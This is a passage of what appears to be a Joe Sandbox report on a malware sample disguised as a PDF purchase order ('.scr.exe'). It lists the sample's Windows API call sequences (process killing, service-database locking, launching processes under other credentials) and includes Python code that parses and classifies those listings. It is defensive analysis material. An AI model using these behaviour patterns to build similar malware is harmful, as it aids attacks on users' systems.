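        "• OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364",
        "• CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376",
        "• CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383",
        "• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0",
    ],
}

if __name__ == "__main__":
    for name, info in analyze(LISTINGS).items():
        apis = ", ".join(f"{c.api}@{c.ref:08X}" for c in info["calls"])
        print(f"{name}: tags={info['tags']} modules={info['modules']}\n  {apis}")
```

Run as a script it prints one line per function with its tags, modules and call sites; fn_C is the only one tagged alt_credential_launch, while fn_A and fn_B come out as plain GUI teardown. The signature table matches on presence within a function, which is what the report's grouping gives you; if you need the calls in execution order rather than address order you have to take that from the dynamic trace, not from these bullets.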
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                                                                                                                                                                                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                                                                                                                                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                                                                                                                                                                                                                                                            • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
• Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
• Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
• Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
APIs
• ___set_flsgetvalue.LIBCMT ref: 0041418F
• __calloc_crt.LIBCMT ref: 0041419B
• __getptd.LIBCMT ref: 004141A8
• CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
• GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
• __dosmaperr.LIBCMT ref: 00414201
  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
• String ID:
• API String ID: 1803633139-0
• Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
• Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
• Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
• Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
APIs
• ImageList_Destroy.COMCTL32(?), ref: 004555E8
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3275902921-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                                                                                                                                                                                            • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
APIs
• SendMessageW.USER32 ref: 004554DF
• SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: DeleteDestroyMessageObjectSend$IconWindow
• String ID:
• API String ID: 3691411573-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _wcslen$_wcstok$ExtentPoint32Text
• String ID:
• API String ID: 1814673581-0
APIs
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
APIs
  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
• MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
• LineTo.GDI32(?,?,?), ref: 00447227
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
• LineTo.GDI32(?,?,?), ref: 0044723D
• EndPath.GDI32(?), ref: 0044724E
• StrokePath.GDI32(?), ref: 0044725C
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 372113273-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                                                                                                                                                                                                            • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Virtual
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                                                                                                                                                                                                            • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0044CBEF
                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                                                                                                                                                                                                            • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
• Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
• Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
• Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
• GetWindowThreadProcessId.USER32(?,?), ref: 00437150
• OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
• CloseHandle.KERNEL32(00000000), ref: 00437174
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
• Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
• Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
• Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,00000004), ref: 00436055
• LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
• UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
• CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
• GetLastError.KERNEL32 ref: 00436081
• CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
• String ID:
• API String ID: 1690418490-0
• Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
• Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
• Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
• Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
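The two API listings above (the PostMessageW/TerminateProcess function at 00437127 and the OpenSCManagerW/LockServiceDatabase function at 00436055) read as raw call sequences; what an analyst wants is the meaning of the constants and the behaviour they add up to. The following is an added example, written for this page and not code from the report, from Joe Sandbox or from the sample: a small Python parser for the "APIs" listing shape shown above that resolves the Windows SDK values visible in the arguments (0x10 = WM_CLOSE, 0x2 = SMTO_ABORTIFHUNG, 0x1F4 = 500 ms, 0x1F0FFF = PROCESS_ALL_ACCESS, 0x8 = SC_MANAGER_LOCK) and flags the two patterns they form. It assumes the listing format stays as printed here (bullet, API.MODULE, optional hex argument list, "ref:" address); the sample input is the two listings copied from this page with the long desktop path shortened, and the extra values after OpenSCManagerW's three real parameters appear to be further stack slots printed by the tool, so the parser only interprets arguments up to the documented parameter count.

```python
import re
from dataclasses import dataclass

# Constructed input: the two API listings from the report entries above, copied as
# Joe Sandbox prints them (the file path argument is shortened for readability).
SAMPLE_KILL = """\
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
• GetWindowThreadProcessId.USER32(?,?), ref: 00437150
• OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
• CloseHandle.KERNEL32(00000000), ref: 00437174
"""
SAMPLE_SCM = """\
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\\Users\\user\\Desktop\\sample.scr.exe,00000004), ref: 00436055
• LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
• UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
• CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
• GetLastError.KERNEL32 ref: 00436081
• CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
"""

# One listing line: optional "Part of subcall function ...:" prefix, API.MODULE,
# optional "(args)", then the call-site address after "ref:".
LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

@dataclass
class Call:
    api: str
    module: str
    args: list   # int for hex literals, None for '?', str for anything else (paths)
    ref: int

def parse_arg(text):
    text = text.strip()
    if text == "?":
        return None          # value unknown to the static analysis
    try:
        return int(text, 16)
    except ValueError:
        return text          # e.g. a string the tool resolved from the stack

def parse_listing(listing):
    calls = []
    for line in listing.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls

# Windows SDK names for the argument positions that matter in these two patterns.
NAMED = {
    ("PostMessageW", 1): {0x0010: "WM_CLOSE"},
    ("SendMessageTimeoutW", 1): {0x0010: "WM_CLOSE"},
    ("SendMessageTimeoutW", 4): {0x0002: "SMTO_ABORTIFHUNG"},
    ("OpenProcess", 0): {0x001F0FFF: "PROCESS_ALL_ACCESS"},
    ("OpenSCManagerW", 2): {0x0008: "SC_MANAGER_LOCK"},
}
TIMEOUT_MS = {("SendMessageTimeoutW", 5)}     # positions holding a millisecond timeout
# Documented parameter counts; values printed beyond these are ignored.
PARAM_COUNT = {"OpenSCManagerW": 3, "OpenProcess": 3, "PostMessageW": 4,
               "SendMessageTimeoutW": 7, "TerminateProcess": 2}

def annotate(call):
    """Human-readable notes for the recognised constants of one call."""
    notes = []
    limit = PARAM_COUNT.get(call.api, len(call.args))
    for i, value in enumerate(call.args[:limit]):
        if not isinstance(value, int):
            continue
        name = NAMED.get((call.api, i), {}).get(value)
        if name:
            notes.append(f"arg{i}=0x{value:X} ({name})")
        elif (call.api, i) in TIMEOUT_MS:
            notes.append(f"arg{i}={value} ms timeout")
    return notes

def classify(calls):
    """Flag the two behaviours the listings show; returns a list of findings."""
    apis = {c.api for c in calls}
    findings = []
    sends_wm_close = any(c.api in ("PostMessageW", "SendMessageTimeoutW")
                         and len(c.args) > 1 and c.args[1] == 0x10 for c in calls)
    if sends_wm_close and {"GetWindowThreadProcessId", "OpenProcess", "TerminateProcess"} <= apis:
        findings.append("kill-by-window: sends WM_CLOSE, then resolves the owning process and calls TerminateProcess")
    locks_scm = any(c.api == "OpenSCManagerW" and len(c.args) > 2 and c.args[2] == 0x8 for c in calls)
    if locks_scm and "LockServiceDatabase" in apis:
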